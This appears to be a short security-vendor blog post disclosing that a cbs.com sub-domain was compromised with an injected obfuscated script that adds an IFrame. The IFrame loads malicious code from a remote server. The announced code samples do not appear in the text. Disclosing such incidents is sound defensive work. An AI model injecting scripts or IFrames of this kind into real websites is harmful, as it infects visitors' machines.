Today Finjan’s MCRC has revealed that the famous radio and television network, CBS, was compromised as a result of malicious activity.
According to Alexa.com the Cbs.com website has a traffic rank of: 964
The cybercriminals added a malicious obfuscated script to the infected page. The injected script injects a malicious IFrame to the page.
Obfuscated script injected on cbs.com sub-domain
The injected IFrame automatically loads another malicious script from a remote server controlled by criminals in Russia, causing a possible installation of malware on the unsuspecting client machine. The remote Russian server is already down.
The obfuscated code as it appears on cbs.com sub-domain in the source:
The de-obfuscated script:
The malicious Russian server, from which the IFrame pulled the malicious code:
As always, the MCRC team immediately informed CBS.com of the infection.
This case shows us once again that infecting legitimate websites with malicious obfuscated code remains a favorite and highly effective attack vector for hackers!
We have not seen the last of it yet……….
Posted by Moshe Basanchig